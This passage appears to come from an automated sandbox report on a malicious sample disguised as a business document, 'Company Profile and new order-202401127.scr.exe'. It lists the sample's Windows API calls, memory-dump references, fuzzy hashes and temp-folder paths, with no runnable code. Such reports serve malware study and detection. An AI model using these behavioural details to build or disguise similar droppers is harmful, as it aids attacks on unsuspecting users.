                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                            • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                            • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                            • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                            • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                            • Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
                                                                                            • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                            • Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                            • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                                            • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                            • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                            • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                                            • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                            • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                                            APIs
                                                                                              • Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                              • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                              • Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2,004033F2,Completed,00000000,00418EC0,00000000), ref: 00405601
                                                                                              • Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                              • Part of subcall function 00405B04: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?, ",?), ref: 00405B2D
                                                                                              • Part of subcall function 00405B04: CloseHandle.KERNEL32(?,?,?, ",?), ref: 00405B3A
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                              • Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
                                                                                              • Part of subcall function 004069C0: GetExitCodeProcess.KERNEL32(?,?), ref: 004069F3
                                                                                              • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2972824698-0
                                                                                            • Opcode ID: 7545d22a5fc035c86024504f61a73d8965a0f4e8d6e977bbe1ed3d5def72935c
                                                                                            • Instruction ID: fabaa3b6efc7a57357b2805df35000a41c8f44054e7a675a900f3985a4c8ce8a
                                                                                            • Opcode Fuzzy Hash: 7545d22a5fc035c86024504f61a73d8965a0f4e8d6e977bbe1ed3d5def72935c
                                                                                            • Instruction Fuzzy Hash: E8F06772905125ABDB20BBA599849DE72B59B00328B25413FE102B22E1C77C4E469AAE
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                                                            • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404AF8
                                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404B04
                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                                              • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                                              • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                              • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                              • Part of subcall function 004067CF: CharNextW.USER32(?,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                              • Part of subcall function 004067CF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                            • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                                              • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                              • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                                              • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\nonopposable\ff4
                                                                                            • API String ID: 2624150263-1139733992
                                                                                            • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                            • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                                                                                            • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                            • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nonopposable\ff4, xrefs: 0040226E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nonopposable\ff4
                                                                                            • API String ID: 542301482-404807915
                                                                                            • Opcode ID: 1237ecbe1a24820be3362f10cc5c3b228794691ac2f4f382d33571bf816e5826
                                                                                            • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                                                                                            • Opcode Fuzzy Hash: 1237ecbe1a24820be3362f10cc5c3b228794691ac2f4f382d33571bf816e5826
                                                                                            • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID:
                                                                                            • API String ID: 1974802433-0
                                                                                            • Opcode ID: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                                            • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                                                                                            • Opcode Fuzzy Hash: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                                            • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                                                            • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                                                            • DeleteObject.GDI32(00000000), ref: 00405007
                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                                              • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                                                            • ShowWindow.USER32(?,00000005), ref: 00405169
                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00405337
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405347
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A3
